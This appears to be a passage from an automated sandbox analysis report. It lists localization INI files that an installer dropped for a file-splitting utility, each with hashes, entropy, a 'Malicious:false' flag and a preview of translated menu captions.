                Preview:[Interface]....MFile->Caption = '...(&F)'..MExit->Caption = '.......'..MOptions->Caption = '...'..MSettings->Caption = '....'..MLanguage->Caption = '....'..MLangArabic->Caption = 'Arabic'..MLangChinese->Caption = '........'..MLangDutch->Caption = 'Dutch'..MLangEnglish->Caption = 'English'..MLangFrench->Caption = 'French'..MLangItalian->Caption = 'Italian'..MLangRussian->Caption = 'Russian'..MLangSpanish->Caption = 'Spanish'..MLangTurkish->Caption = 'Turkish'..MHelp->Caption = '....'..MAbout->Caption = '....'....TabSheetSplit->Caption = '...'..TabSheetCombine->Caption = '...'....GroupBoxCombine->Caption = ' .......... "......" .............'..LabelFirstFile->Caption = '......'..LabelOutput->Caption = '..........'..LabelCombineFolder->Caption = '.........'..LabelSplitFolder->Caption = '.........'..ButtonCombine->Caption = '...'..ButtonStopCombine->Caption = '..'....GroupBoxSplit->Caption = ' .......... "......."............. '..LabelFileName->Caption = '.

                C:\Program Files (x86)\Split Files\language\Dutch.ini (copy)

                Download File
                Process:C:\Users\user\AppData\Local\Temp\is-GA371.tmp\is-EPSRP.tmp
                File Type:ISO-8859 text, with CRLF line terminators
                Category:dropped
                Size (bytes):2687
                Entropy (8bit):5.051567814097503
                Encrypted:false
                SSDEEP:48:HGgXRVA+sqgh59WJIo4yvHIExBMHkWREHZDNbHBsBOtiSZls5crRMfiE:HGusSgEvMHfREHN9hsoiOUBiE
                MD5:D2471D35D833E2544D67365E015E6153
                SHA1:497EE8FF9519D025BD10C5AA15DDC34DFB1B334B
                SHA-256:4831DDBCFE327E2542F4565E7A948C5828D71003B8444723E1E11BA6BB43ACE7
                SHA-512:C82B30D604A679F87B8D0B1670A0D1607E25150FFCFD1C9E631241916BA93CEB5A33AFCAA9080149096ACA1913791384860F5699F2BB302B6CB190AF777EB3CE
                Malicious:false
                Preview:[Interface]....MFile->Caption = '&File'..MExit->Caption = 'Programma Afsluiten'..MOptions->Caption = 'Options'..MSettings->Caption = 'Instellingen'..MLanguage->Caption = 'Kies Taal'..MLangArabic->Caption = 'Arabisch'..MLangChinese->Caption = 'Chinese'..MLangDutch->Caption = 'Nederlands'..MLangEnglish->Caption = 'Engels'..MLangFrench->Caption = 'Frans'..MLangItalian->Caption = 'Italiaans'..MLangRussian->Caption = 'Russisch'..MLangSpanish->Caption = 'Spaans'..MLangTurkish->Caption = 'Turkish'..MHelp->Caption = 'Hulp'..MAbout->Caption = 'Info'....TabSheetSplit->Caption = 'SPLITSEN'..TabSheetCombine->Caption = 'HERENIGEN'....GroupBoxCombine->Caption = ' Drag and drop een van de te herenigen delen in 'Eerste Deel' of browse ernaartoe '..LabelFirstFile->Caption = 'Eerste Deel:'..LabelOutput->Caption = 'Output Bestandsnaam:'..LabelCombineFolder->Caption = 'Output Map:'..LabelSplitFolder->Caption = 'Output Map:'..ButtonCombine->Caption = 'HERENIGEN'..ButtonStopCombine->Caption = 'STOP'....Grou

                C:\Program Files (x86)\Split Files\language\English.ini (copy)

                Download File
                Process:C:\Users\user\AppData\Local\Temp\is-GA371.tmp\is-EPSRP.tmp
                File Type:ASCII text, with CRLF line terminators
                Category:dropped
                Size (bytes):2594
                Entropy (8bit):5.044497576650396
                Encrypted:false
                SSDEEP:48:HGgb5l+sqiTh7XJ9oVHo1xx0GHLVQ4ZWGAtDAEQmUDcQdWym:HGdpa1jfHLVQ4AGAtWma8H
                MD5:76776746B3CFF1CBD5D56CD44CA2DEF5
                SHA1:2F2ECA50BD7F72232BE84291EF1A7956C24098CC
                SHA-256:EC647D30931F50607CF745D958AAF0367CCEAB9999346188255CFBFB22301EE3
                SHA-512:202436C708D4F34FFCCDC3D33841246C5CEE073AC270DA547C15F9E995A08D36AE4C00982283BF60D62363046BBEAA0125D59075E4629A9D1934039CBFB00BE5
                Malicious:false
                Preview:[Interface]....MFile->Caption = '&File'..MExit->Caption = 'Exit Application'..MOptions->Caption = 'Options'..MSettings->Caption = 'Settings'..MLanguage->Caption = 'Language'..MLangArabic->Caption = 'Arabic'..MLangChinese->Caption = 'Chinese'..MLangDutch->Caption = 'Dutch'..MLangEnglish->Caption = 'English'..MLangFrench->Caption = 'French'..MLangItalian->Caption = 'Italian'..MLangRussian->Caption = 'Russian'..MLangSpanish->Caption = 'Spanish'..MLangTurkish->Caption = 'Turkish'..MHelp->Caption = 'Help'..MAbout->Caption = 'About'....TabSheetSplit->Caption = 'SPLIT'..TabSheetCombine->Caption = 'JOIN'....GroupBoxCombine->Caption = ' Drag and drop one of the files to join in the 'First Part' box or browse to it '..LabelFirstFile->Caption = 'First Part:'..LabelOutput->Caption = 'Output File Name:'..LabelCombineFolder->Caption = 'Output Folder:'..LabelSplitFolder->Caption = 'Output Folder:'..ButtonCombine->Caption = 'JOIN'..ButtonStopCombine->Caption = 'STOP'....GroupBoxSplit->Caption = ' Drag

                C:\Program Files (x86)\Split Files\language\French.ini (copy)

                Download File
                Process:C:\Users\user\AppData\Local\Temp\is-GA371.tmp\is-EPSRP.tmp
                File Type:ISO-8859 text, with CRLF line terminators
                Category:dropped
                Size (bytes):2507
                Entropy (8bit):5.040552699764577
                Encrypted:false
                SSDEEP:48:HGkOA+sq/W7Yve3EkHaBSDbSljMM+v1/D3H:HGb8hABSDbSJMBD
                MD5:336D33F55222F48FBA19EF0911732766
                SHA1:E17A78E3B48192361DB540B1E8C9D0548C9A9FFE
                SHA-256:0E955453FA27CED0D0521F0F960C7743C2090F06263D33EC8FA978B681123E0C
                SHA-512:67EC6B859BCDD66DA59CDB1DC1A4EACFBDA12C57699012EE1573DD88F5AAAB6288E1BD9015C862689F4A1A27E83B28C3A9C99B1895EDF4F47D6F94B0557CDC1F
                Malicious:false
                Preview:[Interface]....MFile->Caption = '&Fichier'..MExit->Caption = 'Quitter'..MOptions->Caption = 'Options'..MSettings->Caption = 'Settings'..MLanguage->Caption = 'Langage'..MLangArabic->Caption = 'Arabe'..MLangChinese->Caption = 'Chinese'..MLangDutch->Caption = 'Flamand'..MLangEnglish->Caption = 'Englais'..MLangFrench->Caption = 'Francais'..MLangItalian->Caption = 'Italien'..MLangRussian->Caption = 'Russe'..MLangSpanish->Caption = 'Espagnol'..MLangTurkish->Caption = 'Turkish'..MHelp->Caption = 'Aide'..MAbout->Caption = 'A propos de ..'....TabSheetSplit->Caption = 'Scinder'..TabSheetCombine->Caption = 'Assembler'....GroupBoxCombine->Caption = ' Faire glisser un des fichiers bloc . assembler ou rechercher le par ... '..LabelFirstFile->Caption = 'Premier Fichier:'..LabelOutput->Caption = 'Fichier de sortie: '..LabelCombineFolder->Caption = 'R.pertoire Dest.'..LabelSplitFolder->Caption = 'R.pertoire Dest.'..ButtonCombine->Caption = 'Assembler'..ButtonStopCombine->Caption = 'Stop'....GroupBoxSpl

                C:\Program Files (x86)\Split Files\language\Italian.ini (copy)

                Download File
                Process:C:\Users\user\AppData\Local\Temp\is-GA371.tmp\is-EPSRP.tmp
                File Type:ISO-8859 text, with CRLF line terminators
                Category:dropped
                Size (bytes):2729
                Entropy (8bit):5.029883215699414
                Encrypted:false
                SSDEEP:48:HGgS7++sqMsmQYEJK7bHExsA9GZ1MTn6btlOWH6r3zvX5c9WYN:HGjUoR9GXML6RYWH6rDRdYN
                MD5:8AFE543CB6791AA250312EBA61BF7C13
                SHA1:BFD229D43BE86728A634055AD65860157C2671BD
                SHA-256:AF5BFB663E715C48C55E24BC3BEA30FCAA9BE8EAF35133FBB75D54C5735696AC
                SHA-512:5CF85F84DD6D363B2AAC720CF10C5289350EB706DC2BF5CA824CF220C3607CC7969CDD2F4B2912DC97C7BE50CEDC24A9A01AFC585CE84B6B8CB81419153931A2
                Malicious:false
                Preview:[Interface]....MFile->Caption = '&File'..MExit->Caption = 'Termina programma'..MOptions->Caption = 'Options'..MSettings->Caption = 'Impostazioni'..MLanguage->Caption = 'Seleziona Lingua'..MLangArabic->Caption = 'Arabo'..MLangChinese->Caption = 'Chinese'..MLangDutch->Caption = 'Olandese'..MLangEnglish->Caption = 'Inglese'..MLangFrench->Caption = 'Francese'..MLangItalian->Caption = 'Italiano'..MLangRussian->Caption = 'Russo'..MLangSpanish->Caption = 'Spagnolo'..MLangTurkish->Caption = 'Turkish'..MHelp->Caption = 'Aiuto'..MAbout->Caption = 'Informazioni'....TabSheetSplit->Caption = 'DIVIDI'..TabSheetCombine->Caption = 'UNISCI'....GroupBoxCombine->Caption = ' Drag and drop una delle parti da unire nella casella 'Prima Parte' o segui percorso '..LabelFirstFile->Caption = 'Prima Parte:'..LabelOutput->Caption = 'Nome File Uscita:'..LabelCombineFolder->Caption = 'Cartella Uscita:'..LabelSplitFolder->Caption = 'Cartella Uscita:'..ButtonCombine->Caption = 'UNISCI'..ButtonStopCombine->Caption = '

                C:\Program Files (x86)\Split Files\language\Russian.ini (copy)

                Download File
                Process:C:\Users\user\AppData\Local\Temp\is-GA371.tmp\is-EPSRP.tmp
                File Type:ISO-8859 text, with CRLF line terminators
                Category:dropped
                Size (bytes):2299
                Entropy (8bit):5.691502190790686
                Encrypted:false
                SSDEEP:48:HG9uhjkDYhqGQjsONHiHQgGU9dm6nclk6a1hg22mo6LD:HGnzLIQTUPmcclGsmogD
                MD5:F9F47FF3D866FFC4F38E315E41356E55
                SHA1:EFC313A99993B5FB8A454D4C5197C6F3965B5C89
                SHA-256:3A13CCE54190BF4A679D21F61466A0A18E9340287CAA1AA4EACB38C99C9D4957
                SHA-512:6EC1F1E19921C535A50254500ED01602DA74D3CC9E6DA8B5FC78D89255E42C5968BD294E56F584EE273630B9233C20CAFEBC906354CE393FE1CFFE91528F527A
                Malicious:false
                Preview:[Interface]....MFile->Caption = '&....'..MExit->Caption = '.....'..MOptions->Caption = '.....'..MSettings->Caption = '.........'..MLanguage->Caption = '....'..MLangEnglish->Caption = '..........'..MLangRussian->Caption = '.......'..MLangArabic->Caption = '........'..MLangChinese->Caption = '.........'..MLangDutch->Caption = '.......'..MLangFrench->Caption = '...........'..MLangItalian->Caption = '...........'..MLangSpanish->Caption = '.........'..MLangTurkish->Caption = 'Turkish'..MHelp->Caption = '......'..MAbout->Caption = '. .........'....TabSheetSplit->Caption = '.......'..TabSheetCombine->Caption = '.......'....GroupBoxCombine->Caption = ' ....... ..... '..LabelFirstFile->Caption = '1-. ....:'..LabelOutput->Caption = '........: '..LabelCombineFolder->Caption = '..........:'..ButtonCombine->Caption = '.......'..ButtonStopCombine->Caption = '....'....GroupBoxSplit->Caption = ' ....... .... '..LabelSplitFolder->Caption = '..........:'..LabelFileName->Caption = '... .....:'..LabelFile

                C:\Program Files (x86)\Split Files\language\Spanish.ini (copy)

                Download File
                Process:C:\Users\user\AppData\Local\Temp\is-GA371.tmp\is-EPSRP.tmp
                File Type:ISO-8859 text, with CRLF line terminators
                Category:dropped
                Size (bytes):2718
                Entropy (8bit):5.057121428169199
                Encrypted:false
                SSDEEP:48:HGPWFaxAA+sqKvFYLcunHh3QxXOBp1OB5r70h3CGRsJE0laDwXCqXH5wGF5JoCPa:HGPAPZBAJU1k7Jb245xVfUMG
                MD5:21B4D47F5D851271C89310C92777FB70
                SHA1:9D85FF8F7107CFAE3F31993FAF7F249591AFCB27
                SHA-256:D88AE9E292EBC4E56767892FD451E2E8278FCE776CAD689731EE7875748D55D7
                SHA-512:46F26B51D6959A36E33266887E39CB98E7E67880052DE8DE741CB93C90ED3B28C87A224CE710E6C698FE648ED8B062E73DEDC253A6C5A8362EB3EF2792AB4FBF
                Malicious:false
                Preview:[Interface]....MFile->Caption = '&Archivo'..MExit->Caption = 'Salir'..MOptions->Caption = 'Options'..MSettings->Caption = 'Herramientas'..MLanguage->Caption = 'Elegir idioma'..MLangArabic->Caption = 'Arabe'..MLangChinese->Caption = 'Chinese'..MLangDutch->Caption = 'Holand.s'..MLangEnglish->Caption = 'Ingl.s'..MLangFrench->Caption = 'Franc.s'..MLangItalian->Caption = 'Italiano'..MLangRussian->Caption = 'Ruso'..MLangSpanish->Caption = 'Espa.ol'..MLangTurkish->Caption = 'Turkish'..MHelp->Caption = 'Ayuda'..MAbout->Caption = 'Sobre programa'....TabSheetSplit->Caption = 'SEPARAR'..TabSheetCombine->Caption = 'JUNTAR'....GroupBoxCombine->Caption = ' Drag and drop una de las partes para juntar en la celda 'Primera Parte' o navegar '..LabelFirstFile->Caption = 'Primera Parte:'..LabelOutput->Caption = 'Nombre Archivo salida:'..LabelCombineFolder->Caption = 'Carpeta salida:'..LabelSplitFolder->Caption = 'Carpeta salida:'..ButtonCombine->Caption = 'JUNTAR'..ButtonStopCombine->Caption = 'PARAR'....

                C:\Program Files (x86)\Split Files\language\Turkish.ini (copy)

                Download File
                Process:C:\Users\user\AppData\Local\Temp\is-GA371.tmp\is-EPSRP.tmp
                File Type:ISO-8859 text, with CRLF line terminators
                Category:dropped
                Size (bytes):2607
                Entropy (8bit):5.234177949162883
                Encrypted:false
                SSDEEP:48:HGUyjEiB0w3l+sqiTh7XJ9UeHjIDt00AoB/nheSSMpSSSxPYe:HGpNBrkGIDt0qnheS9Sx
                MD5:E1271E0DDD609CD7F9C2367D32FEBE4B
                SHA1:0A420424F1FADE0BFF002E63AAD22B5E94B86CAC
                SHA-256:AEE6B1EDFFFCE507E2207C7E2AA36DA42B2AC54CEB28B9759B2D05F1012CBA8F
                SHA-512:86A11C9E4B59F2437180F56CAD44E69CB29B03B93983EA5E35CBCC5BDD40CFC424EE1EEF519B2E44D67623C79835AF92B4B089AC29890C046CD590C1F8BFA574
                Malicious:false
                Preview:[Interface]....MFile->Caption = '&Dosya'..MExit->Caption = 'Uygulamay. Kapat'..MOptions->Caption = 'Se.enekler'..MSettings->Caption = 'Ayarlar'..MLanguage->Caption = 'Dil'..MLangArabic->Caption = 'Arabic'..MLangChinese->Caption = 'Chinese'..MLangDutch->Caption = 'Dutch'..MLangEnglish->Caption = 'English'..MLangFrench->Caption = 'French'..MLangItalian->Caption = 'Italian'..MLangRussian->Caption = 'Russian'..MLangSpanish->Caption = 'Spanish'..MLangTurkish->Caption = 'Turkish'..MHelp->Caption = 'Yard.m'..MAbout->Caption = 'Hakk.nda'....TabSheetSplit->Caption = 'PAR.ALA'..TabSheetCombine->Caption = 'B.RLE.T.R'....GroupBoxCombine->Caption = ' .lk par.ay. s.r.kleyin yada g.zat. kullan.n '..LabelFirstFile->Caption = '.lk Par.a:'..LabelOutput->Caption = 'Birle.tirme Ad.:'..LabelCombineFolder->Caption = '..kt. Klas.r.:'..LabelSplitFolder->Caption = '..kt. Klas.r.:'..ButtonCombine->Caption = 'B.RLE.T.R'..ButtonStopCombine->Caption = 'DUR'....GroupBoxSplit->Caption = ' B.lmek istedi.iniz dosyay.

                C:\Program Files (x86)\Split Files\language\is-2C8S0.tmp

                Download File
                Process:C:\Users\user\AppData\Local\Temp\is-GA371.tmp\is-EPSRP.tmp
                File Type:ASCII text, with CRLF line terminators
                Category:dropped
                Size (bytes):2594
                Entropy (8bit):5.044497576650396
                Encrypted:false
                SSDEEP:48:HGgb5l+sqiTh7XJ9oVHo1xx0GHLVQ4ZWGAtDAEQmUDcQdWym:HGdpa1jfHLVQ4AGAtWma8H
                MD5:76776746B3CFF1CBD5D56CD44CA2DEF5
                SHA1:2F2ECA50BD7F72232BE84291EF1A7956C24098CC
                SHA-256:EC647D30931F50607CF745D958AAF0367CCEAB9999346188255CFBFB22301EE3
                SHA-512:202436C708D4F34FFCCDC3D33841246C5CEE073AC270DA547C15F9E995A08D36AE4C00982283BF60D62363046BBEAA0125D59075E4629A9D1934039CBFB00BE5
                Malicious:false
                Preview:[Interface]....MFile->Caption = '&File'..MExit->Caption = 'Exit Application'..MOptions->Caption = 'Options'..MSettings->Caption = 'Settings'..MLanguage->Caption = 'Language'..MLangArabic->Caption = 'Arabic'..MLangChinese->Caption = 'Chinese'..MLangDutch->Caption = 'Dutch'..MLangEnglish->Caption = 'English'..MLangFrench->Caption = 'French'..MLangItalian->Caption = 'Italian'..MLangRussian->Caption = 'Russian'..MLangSpanish->Caption = 'Spanish'..MLangTurkish->Caption = 'Turkish'..MHelp->Caption = 'Help'..MAbout->Caption = 'About'....TabSheetSplit->Caption = 'SPLIT'..TabSheetCombine->Caption = 'JOIN'....GroupBoxCombine->Caption = ' Drag and drop one of the files to join in the 'First Part' box or browse to it '..LabelFirstFile->Caption = 'First Part:'..LabelOutput->Caption = 'Output File Name:'..LabelCombineFolder->Caption = 'Output Folder:'..LabelSplitFolder->Caption = 'Output Folder:'..ButtonCombine->Caption = 'JOIN'..ButtonStopCombine->Caption = 'STOP'....GroupBoxSplit->Caption = ' Drag

                C:\Program Files (x86)\Split Files\language\is-2KTR4.tmp

                Download File
                Process:C:\Users\user\AppData\Local\Temp\is-GA371.tmp\is-EPSRP.tmp
                File Type:ISO-8859 text, with CRLF line terminators
                Category:dropped
                Size (bytes):2607
                Entropy (8bit):5.234177949162883
                Encrypted:false
                SSDEEP:48:HGUyjEiB0w3l+sqiTh7XJ9UeHjIDt00AoB/nheSSMpSSSxPYe:HGpNBrkGIDt0qnheS9Sx
                MD5:E1271E0DDD609CD7F9C2367D32FEBE4B
                SHA1:0A420424F1FADE0BFF002E63AAD22B5E94B86CAC
                SHA-256:AEE6B1EDFFFCE507E2207C7E2AA36DA42B2AC54CEB28B9759B2D05F1012CBA8F
                SHA-512:86A11C9E4B59F2437180F56CAD44E69CB29B03B93983EA5E35CBCC5BDD40CFC424EE1EEF519B2E44D67623C79835AF92B4B089AC29890C046CD590C1F8BFA574
                Malicious:false
                Preview:[Interface]....MFile->Caption = '&Dosya'..MExit->Caption = 'Uygulamay. Kapat'..MOptions->Caption = 'Se.enekler'..MSettings->Caption = 'Ayarlar'..MLanguage->Caption = 'Dil'..MLangArabic->Caption = 'Arabic'..MLangChinese->Caption = 'Chinese'..MLangDutch->Caption = 'Dutch'..MLangEnglish->Caption = 'English'..MLangFrench->Caption = 'French'..MLangItalian->Caption = 'Italian'..MLangRussian->Caption = 'Russian'..MLangSpanish->Caption = 'Spanish'..MLangTurkish->Caption = 'Turkish'..MHelp->Caption = 'Yard.m'..MAbout->Caption = 'Hakk.nda'....TabSheetSplit->Caption = 'PAR.ALA'..TabSheetCombine->Caption = 'B.RLE.T.R'....GroupBoxCombine->Caption = ' .lk par.ay. s.r.kleyin yada g.zat. kullan.n '..LabelFirstFile->Caption = '.lk Par.a:'..LabelOutput->Caption = 'Birle.tirme Ad.:'..LabelCombineFolder->Caption = '..kt. Klas.r.:'..LabelSplitFolder->Caption = '..kt. Klas.r.:'..ButtonCombine->Caption = 'B.RLE.T.R'..ButtonStopCombine->Caption = 'DUR'....GroupBoxSplit->Caption = ' B.lmek istedi.iniz dosyay.

                C:\Program Files (x86)\Split Files\language\is-4QNQO.tmp

                Download File
                Process:C:\Users\user\AppData\Local\Temp\is-GA371.tmp\is-EPSRP.tmp
                File Type:ISO-8859 text, with CRLF line terminators
                Category:dropped
                Size (bytes):2266
                Entropy (8bit):5.4593359267896355
                Encrypted:false
                SSDEEP:48:HG8il+sqirh7zJ9YTHskp1r4phFAqLNnK9h:HGkSkp1r4NTKf
                MD5:4ABA9765EB3555788F5706D87A9D2DCA
                SHA1:36C0895FBF9F99690CA55C54CC56310E24513113
                SHA-256:E99B943206594C04BC0383669D04D4F191A501F46D2474FED08B997F8020B433
                SHA-512:3498485635AFC548663715D22071611BAB10C707E8E24BE0B5143EE4A27727DA7D18A5E6959E3F6DD7D0F615DDFD50CE9FC5CE8AE6DDC5BEE287B5A00A817288
                Malicious:false
                Preview:[Interface]....MFile->Caption = '...'..MExit->Caption =' ....'..MOptions->Caption = 'Options'..MSettings->Caption =' .........'..MLanguage->Caption =' ......'..MLangArabic->Caption = 'Arabic'..MLangChinese->Caption = 'Chinese'..MLangDutch->Caption = 'Dutch'..MLangEnglish->Caption =' .......'..MLangFrench->Caption = 'French'..MLangItalian->Caption = 'Italian'..MLangRussian->Caption = '....'..MLangSpanish->Caption = 'Spanish'..MLangTurkish->Caption = 'Turkish'..MHelp->Caption =' .......'..MAbout->Caption =' ...'....TabSheetSplit->Caption = ' ... .......'..TabSheetCombine->Caption = ' ...'....GroupBoxCombine->Caption =' ... .......'..LabelFirstFile->Caption = '..... .....:'..LabelOutput->Caption = '... ....:'..LabelCombineFolder->Caption =' .... ......:'..LabelSplitFolder->Caption = '.... ......:'..ButtonCombine->Caption =' ...'..ButtonStopCombine->Caption = '....'....GroupBoxSplit->Caption = '... .......'..LabelFileName->Caption =' ..... ...: '..LabelSplitFolder->Caption =' .... ......:'

                C:\Program Files (x86)\Split Files\language\is-8T8VP.tmp

                Download File
                Process:C:\Users\user\AppData\Local\Temp\is-GA371.tmp\is-EPSRP.tmp
                File Type:ISO-8859 text, with CRLF line terminators
                Category:dropped
                Size (bytes):2718
                Entropy (8bit):5.057121428169199
                Encrypted:false
                SSDEEP:48:HGPWFaxAA+sqKvFYLcunHh3QxXOBp1OB5r70h3CGRsJE0laDwXCqXH5wGF5JoCPa:HGPAPZBAJU1k7Jb245xVfUMG
                MD5:21B4D47F5D851271C89310C92777FB70
                SHA1:9D85FF8F7107CFAE3F31993FAF7F249591AFCB27
                SHA-256:D88AE9E292EBC4E56767892FD451E2E8278FCE776CAD689731EE7875748D55D7
                SHA-512:46F26B51D6959A36E33266887E39CB98E7E67880052DE8DE741CB93C90ED3B28C87A224CE710E6C698FE648ED8B062E73DEDC253A6C5A8362EB3EF2792AB4FBF
                Malicious:false
                Preview:[Interface]....MFile->Caption = '&Archivo'..MExit->Caption = 'Salir'..MOptions->Caption = 'Options'..MSettings->Caption = 'Herramientas'..MLanguage->Caption = 'Elegir idioma'..MLangArabic->Caption = 'Arabe'..MLangChinese->Caption = 'Chinese'..MLangDutch->Caption = 'Holand.s'..MLangEnglish->Caption = 'Ingl.s'..MLangFrench->Caption = 'Franc.s'..MLangItalian->Caption = 'Italiano'..MLangRussian->Caption = 'Ruso'..MLangSpanish->Caption = 'Espa.ol'..MLangTurkish->Caption = 'Turkish'..MHelp->Caption = 'Ayuda'..MAbout->Caption = 'Sobre programa'....TabSheetSplit->Caption = 'SEPARAR'..TabSheetCombine->Caption = 'JUNTAR'....GroupBoxCombine->Caption = ' Drag and drop una de las partes para juntar en la celda 'Primera Parte' o navegar '..LabelFirstFile->Caption = 'Primera Parte:'..LabelOutput->Caption = 'Nombre Archivo salida:'..LabelCombineFolder->Caption = 'Carpeta salida:'..LabelSplitFolder->Caption = 'Carpeta salida:'..ButtonCombine->Caption = 'JUNTAR'..ButtonStopCombine->Caption = 'PARAR'....

                C:\Program Files (x86)\Split Files\language\is-BOL01.tmp

                Download File
                Process:C:\Users\user\AppData\Local\Temp\is-GA371.tmp\is-EPSRP.tmp
                File Type:ISO-8859 text, with CRLF line terminators
                Category:dropped
                Size (bytes):2729
                Entropy (8bit):5.029883215699414
                Encrypted:false
                SSDEEP:48:HGgS7++sqMsmQYEJK7bHExsA9GZ1MTn6btlOWH6r3zvX5c9WYN:HGjUoR9GXML6RYWH6rDRdYN
                MD5:8AFE543CB6791AA250312EBA61BF7C13
                SHA1:BFD229D43BE86728A634055AD65860157C2671BD
                SHA-256:AF5BFB663E715C48C55E24BC3BEA30FCAA9BE8EAF35133FBB75D54C5735696AC
                SHA-512:5CF85F84DD6D363B2AAC720CF10C5289350EB706DC2BF5CA824CF220C3607CC7969CDD2F4B2912DC97C7BE50CEDC24A9A01AFC585CE84B6B8CB81419153931A2
                Malicious:false
                Preview:[Interface]....MFile->Caption = '&File'..MExit->Caption = 'Termina programma'..MOptions->Caption = 'Options'..MSettings->Caption = 'Impostazioni'..MLanguage->Caption = 'Seleziona Lingua'..MLangArabic->Caption = 'Arabo'..MLangChinese->Caption = 'Chinese'..MLangDutch->Caption = 'Olandese'..MLangEnglish->Caption = 'Inglese'..MLangFrench->Caption = 'Francese'..MLangItalian->Caption = 'Italiano'..MLangRussian->Caption = 'Russo'..MLangSpanish->Caption = 'Spagnolo'..MLangTurkish->Caption = 'Turkish'..MHelp->Caption = 'Aiuto'..MAbout->Caption = 'Informazioni'....TabSheetSplit->Caption = 'DIVIDI'..TabSheetCombine->Caption = 'UNISCI'....GroupBoxCombine->Caption = ' Drag and drop una delle parti da unire nella casella 'Prima Parte' o segui percorso '..LabelFirstFile->Caption = 'Prima Parte:'..LabelOutput->Caption = 'Nome File Uscita:'..LabelCombineFolder->Caption = 'Cartella Uscita:'..LabelSplitFolder->Caption = 'Cartella Uscita:'..ButtonCombine->Caption = 'UNISCI'..ButtonStopCombine->Caption = '

                C:\Program Files (x86)\Split Files\language\is-IRLOP.tmp

                Download File
                Process:C:\Users\user\AppData\Local\Temp\is-GA371.tmp\is-EPSRP.tmp
                File Type:ISO-8859 text, with CRLF line terminators
                Category:dropped
                Size (bytes):2299
                Entropy (8bit):5.691502190790686
                Encrypted:false
                SSDEEP:48:HG9uhjkDYhqGQjsONHiHQgGU9dm6nclk6a1hg22mo6LD:HGnzLIQTUPmcclGsmogD
                MD5:F9F47FF3D866FFC4F38E315E41356E55
                SHA1:EFC313A99993B5FB8A454D4C5197C6F3965B5C89
                SHA-256:3A13CCE54190BF4A679D21F61466A0A18E9340287CAA1AA4EACB38C99C9D4957
                SHA-512:6EC1F1E19921C535A50254500ED01602DA74D3CC9E6DA8B5FC78D89255E42C5968BD294E56F584EE273630B9233C20CAFEBC906354CE393FE1CFFE91528F527A
                Malicious:false
                Preview:[Interface]....MFile->Caption = '&....'..MExit->Caption = '.....'..MOptions->Caption = '.....'..MSettings->Caption = '.........'..MLanguage->Caption = '....'..MLangEnglish->Caption = '..........'..MLangRussian->Caption = '.......'..MLangArabic->Caption = '........'..MLangChinese->Caption = '.........'..MLangDutch->Caption = '.......'..MLangFrench->Caption = '...........'..MLangItalian->Caption = '...........'..MLangSpanish->Caption = '.........'..MLangTurkish->Caption = 'Turkish'..MHelp->Caption = '......'..MAbout->Caption = '. .........'....TabSheetSplit->Caption = '.......'..TabSheetCombine->Caption = '.......'....GroupBoxCombine->Caption = ' ....... ..... '..LabelFirstFile->Caption = '1-. ....:'..LabelOutput->Caption = '........: '..LabelCombineFolder->Caption = '..........:'..ButtonCombine->Caption = '.......'..ButtonStopCombine->Caption = '....'....GroupBoxSplit->Caption = ' ....... .... '..LabelSplitFolder->Caption = '..........:'..LabelFileName->Caption = '... .....:'..LabelFile

                C:\Program Files (x86)\Split Files\language\is-KJUD7.tmp

                Download File
                Process:C:\Users\user\AppData\Local\Temp\is-GA371.tmp\is-EPSRP.tmp
                File Type:ISO-8859 text, with CRLF line terminators
                Category:dropped
                Size (bytes):2345
                Entropy (8bit):5.847861612631974
                Encrypted:false
                SSDEEP:48:HGj2lE8qiTh7XJ9zHadtPTTD1n34q1jgun1ITq8K:HG5RDTln34qRgusK
                MD5:A5C9FEA89EFE8E2162BA477E8EA39B44
                SHA1:E6A2042C574D14786891F0C32F92C8292BBB4ACA
                SHA-256:8DDFB50DACA491296101BAB3DB9B77C7587127E684D9E22EFD6DC93F84A008FA
                SHA-512:3F7944F262717D308A1235982E741536DA6A4DF9ABEE4E2811E1151B53C3D31811EA3EB750ED39F347F7DF14AD20FF981C85CC2DA297BE745547B36D41B8FDB9
                Malicious:false
                Preview:[Interface]....MFile->Caption = '...(&F)'..MExit->Caption = '.......'..MOptions->Caption = '...'..MSettings->Caption = '....'..MLanguage->Caption = '....'..MLangArabic->Caption = 'Arabic'..MLangChinese->Caption = '........'..MLangDutch->Caption = 'Dutch'..MLangEnglish->Caption = 'English'..MLangFrench->Caption = 'French'..MLangItalian->Caption = 'Italian'..MLangRussian->Caption = 'Russian'..MLangSpanish->Caption = 'Spanish'..MLangTurkish->Caption = 'Turkish'..MHelp->Caption = '....'..MAbout->Caption = '....'....TabSheetSplit->Caption = '...'..TabSheetCombine->Caption = '...'....GroupBoxCombine->Caption = ' .......... "......" .............'..LabelFirstFile->Caption = '......'..LabelOutput->Caption = '..........'..LabelCombineFolder->Caption = '.........'..LabelSplitFolder->Caption = '.........'..ButtonCombine->Caption = '...'..ButtonStopCombine->Caption = '..'....GroupBoxSplit->Caption = ' .......... "......."............. '..LabelFileName->Caption = '.

                C:\Program Files (x86)\Split Files\language\is-L90L4.tmp

                Download File
                Process:C:\Users\user\AppData\Local\Temp\is-GA371.tmp\is-EPSRP.tmp
                File Type:ISO-8859 text, with CRLF line terminators
                Category:dropped
                Size (bytes):2507
                Entropy (8bit):5.040552699764577
                Encrypted:false
                SSDEEP:48:HGkOA+sq/W7Yve3EkHaBSDbSljMM+v1/D3H:HGb8hABSDbSJMBD
                MD5:336D33F55222F48FBA19EF0911732766
                SHA1:E17A78E3B48192361DB540B1E8C9D0548C9A9FFE
                SHA-256:0E955453FA27CED0D0521F0F960C7743C2090F06263D33EC8FA978B681123E0C
                SHA-512:67EC6B859BCDD66DA59CDB1DC1A4EACFBDA12C57699012EE1573DD88F5AAAB6288E1BD9015C862689F4A1A27E83B28C3A9C99B1895EDF4F47D6F94B0557CDC1F
                Malicious:false
